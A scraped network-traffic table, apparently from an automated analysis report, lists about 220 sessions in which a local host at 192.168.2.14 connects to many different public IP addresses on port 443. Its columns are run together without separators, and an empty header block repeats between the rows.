                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13202192.168.2.145356054.142.204.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13203192.168.2.1448424170.24.132.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13204192.168.2.1438038202.245.79.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13205192.168.2.1444742189.42.25.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13206192.168.2.1444012216.109.148.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13207192.168.2.1446912139.168.173.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13208192.168.2.1449136198.177.224.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13209192.168.2.1452610175.85.93.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13210192.168.2.1439256177.130.147.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13211192.168.2.1443262140.114.136.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13212192.168.2.1451548159.212.51.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13213192.168.2.1460208122.216.145.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13214192.168.2.1450616104.242.232.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13215192.168.2.1460672151.44.178.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13216192.168.2.1450214142.128.135.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13217192.168.2.1453452154.150.90.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13218192.168.2.1433762156.45.162.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13219192.168.2.1447272151.33.114.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13220192.168.2.145694492.39.135.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13221192.168.2.145117076.39.209.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13222192.168.2.1434910168.65.72.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13223192.168.2.145990488.250.163.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13224192.168.2.144754245.118.176.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13225192.168.2.1440468219.224.105.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13226192.168.2.145215897.214.179.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13227192.168.2.1446652109.5.113.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13228192.168.2.1432848181.196.173.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13229192.168.2.1454258188.196.246.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13230192.168.2.1450218160.219.38.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13231192.168.2.1435262171.20.48.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13232192.168.2.1439786101.143.116.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13233192.168.2.144228881.208.161.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13234192.168.2.1438594161.110.38.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13235192.168.2.1446154100.187.124.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13236192.168.2.1438932194.108.185.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13237192.168.2.144246245.63.14.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13238192.168.2.1446152196.75.207.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13239192.168.2.1457806144.10.24.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13240192.168.2.1459978136.100.214.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13241192.168.2.1443478131.52.65.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13242192.168.2.1456882110.31.207.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13243192.168.2.1437066199.220.43.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13244192.168.2.1436108109.167.121.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13245192.168.2.145542868.62.175.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13246192.168.2.1449660199.141.243.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13247192.168.2.145057424.1.131.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13248192.168.2.143312223.137.174.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13249192.168.2.144147869.240.67.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13250192.168.2.1449032119.134.39.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13251192.168.2.1449312123.179.79.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13252192.168.2.1450934199.218.51.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13253192.168.2.143465817.237.141.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13254192.168.2.144068643.215.81.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13255192.168.2.1454356204.87.218.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13256192.168.2.1458686202.96.54.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13257192.168.2.1456148174.225.9.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13258192.168.2.1448612186.198.132.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13259192.168.2.1446414176.162.215.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13260192.168.2.1450440136.191.76.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13261192.168.2.145406096.20.14.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13262192.168.2.144605075.57.26.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13263192.168.2.1444982184.173.221.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13264192.168.2.143797837.127.169.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13265192.168.2.1440224197.13.210.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13266192.168.2.1440340132.196.252.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13267192.168.2.143886277.216.8.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13268192.168.2.1437136151.96.219.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13269192.168.2.1440690100.176.89.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13270192.168.2.143910885.138.169.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13271192.168.2.1442548114.238.98.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13272192.168.2.143663050.91.241.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13273192.168.2.145278486.19.106.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13274192.168.2.143976899.115.37.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13275192.168.2.145187670.236.42.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13276192.168.2.1439086143.247.98.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13277192.168.2.145415814.237.93.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13278192.168.2.143956632.201.252.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13279192.168.2.145759259.91.222.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13280192.168.2.145324493.92.11.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13281192.168.2.1434046216.220.26.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13282192.168.2.143281484.150.232.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13283192.168.2.145535097.85.99.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13284192.168.2.1449138105.16.64.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13285192.168.2.143860679.109.96.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13286192.168.2.143531860.75.217.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13287192.168.2.144267075.155.106.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13288192.168.2.1433288198.9.51.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13289192.168.2.1444892142.49.102.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13290192.168.2.1457814189.143.116.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13291192.168.2.143471670.48.33.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13292192.168.2.143415691.93.127.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13293192.168.2.145901414.46.192.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13294192.168.2.1454582178.169.228.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13295192.168.2.1452236116.65.76.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13296192.168.2.144032243.89.174.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13297192.168.2.144629270.165.176.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13298192.168.2.1444822200.153.115.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13299192.168.2.1456272134.19.35.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13300192.168.2.1459606181.54.63.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13301192.168.2.1459334207.17.203.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13302192.168.2.145426861.60.244.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13303192.168.2.143465092.182.208.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13304192.168.2.1448078196.8.112.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13305192.168.2.143702062.136.145.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13306192.168.2.1457520187.188.226.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13307192.168.2.1441992191.200.22.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13308192.168.2.144563441.74.162.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13309192.168.2.144736464.5.150.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13310192.168.2.1447630128.73.114.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13311192.168.2.1459382203.129.15.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13312192.168.2.1440862117.51.255.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13313192.168.2.144445458.226.64.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13314192.168.2.1434600209.25.40.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13315192.168.2.145557078.66.9.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13316192.168.2.143615261.184.139.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13317192.168.2.1451570125.236.108.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13318192.168.2.1441022205.62.224.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13319192.168.2.1449688105.232.6.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13320192.168.2.1457126173.94.139.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13321192.168.2.145822680.123.55.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13322192.168.2.144931832.254.95.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13323192.168.2.145758850.20.131.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13324192.168.2.1447354109.189.167.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13325192.168.2.145957844.158.186.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13326192.168.2.1443958188.108.161.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13327192.168.2.1442574168.70.235.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13328192.168.2.145994420.192.158.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13329192.168.2.1453132166.203.236.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13330192.168.2.144285890.33.238.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13331192.168.2.143850086.74.117.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13332192.168.2.145833070.141.31.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13333192.168.2.1442488116.153.127.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13334192.168.2.1458494113.241.15.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13335192.168.2.143321484.216.177.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13336192.168.2.1457396105.135.4.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13337192.168.2.1436162223.97.37.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13338192.168.2.145500877.230.4.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13339192.168.2.14403924.138.235.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13340192.168.2.1445176200.140.42.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13341192.168.2.143425653.202.20.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13342192.168.2.143612832.158.13.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13343192.168.2.1448976219.97.176.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13344192.168.2.1439562185.3.48.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13345192.168.2.145662418.43.63.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13346192.168.2.145880293.149.112.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13347192.168.2.1439958205.193.239.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13348192.168.2.14416108.208.90.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13349192.168.2.1436426155.109.50.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13350192.168.2.143435865.62.238.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13351192.168.2.1433234138.133.154.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13352192.168.2.1442574140.211.232.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13353192.168.2.145541694.22.85.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13354192.168.2.1438006134.140.172.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13355192.168.2.1450712222.243.74.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13356192.168.2.1447514135.84.84.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13357192.168.2.143582637.23.33.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13358192.168.2.145260034.244.62.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13359192.168.2.1438238188.113.118.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13360192.168.2.144304079.124.158.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13361192.168.2.1460436114.17.31.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13362192.168.2.1435528157.38.192.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13363192.168.2.144136236.103.42.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13364192.168.2.145365050.178.56.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13365192.168.2.1442818143.130.150.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13366192.168.2.1458186209.179.42.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13367192.168.2.144398040.39.127.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13368192.168.2.1449478114.22.122.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13369192.168.2.1445160159.69.52.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13370192.168.2.1442728137.43.171.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13371192.168.2.1435504136.213.106.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13372192.168.2.1435584115.85.90.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13373192.168.2.1445366151.180.149.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13374192.168.2.1460294145.147.105.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13375192.168.2.144371070.8.108.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13376192.168.2.1440864213.81.178.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13377192.168.2.145422095.214.246.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13378192.168.2.144845066.172.204.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13379192.168.2.144954631.68.217.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13380192.168.2.1452854197.90.18.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13381192.168.2.1448890111.200.126.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13382192.168.2.145844041.237.119.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13383192.168.2.1451610102.28.247.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13384192.168.2.144662053.230.222.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13385192.168.2.144168884.172.131.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13386192.168.2.1447392216.199.27.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13387192.168.2.1455172212.202.160.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13388192.168.2.144961683.88.252.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13389192.168.2.1460052126.242.247.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13390192.168.2.1446598158.35.175.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13391192.168.2.1447416125.61.195.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13392192.168.2.1450898223.31.32.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13393192.168.2.1455980184.227.169.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13394192.168.2.1449316121.186.123.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13395192.168.2.1450308176.101.162.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13396192.168.2.1435842153.179.210.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13397192.168.2.1454912194.108.55.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13398192.168.2.1454076179.63.206.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13399192.168.2.144452218.45.31.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13400192.168.2.1444724213.225.229.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13401192.168.2.1435250221.136.247.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13402192.168.2.1439206167.143.46.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13403192.168.2.1439772122.42.203.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13404192.168.2.145208645.123.184.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13405192.168.2.1441980200.104.212.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13406192.168.2.1454050137.151.220.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13407192.168.2.145057042.195.176.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13408192.168.2.144712279.203.14.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13409192.168.2.144814886.171.101.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13410192.168.2.144704048.77.204.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13411192.168.2.1451202163.104.23.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13412192.168.2.1457032141.27.183.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13413192.168.2.144711042.81.168.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13414192.168.2.144992073.217.188.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13415192.168.2.1458264140.90.9.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13416192.168.2.1450436148.247.211.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13417192.168.2.144831853.80.204.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13418192.168.2.1436598118.154.140.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13419192.168.2.1444112180.202.115.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13420192.168.2.145888696.162.219.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13421192.168.2.1445076120.236.109.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13422192.168.2.1440274174.241.76.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
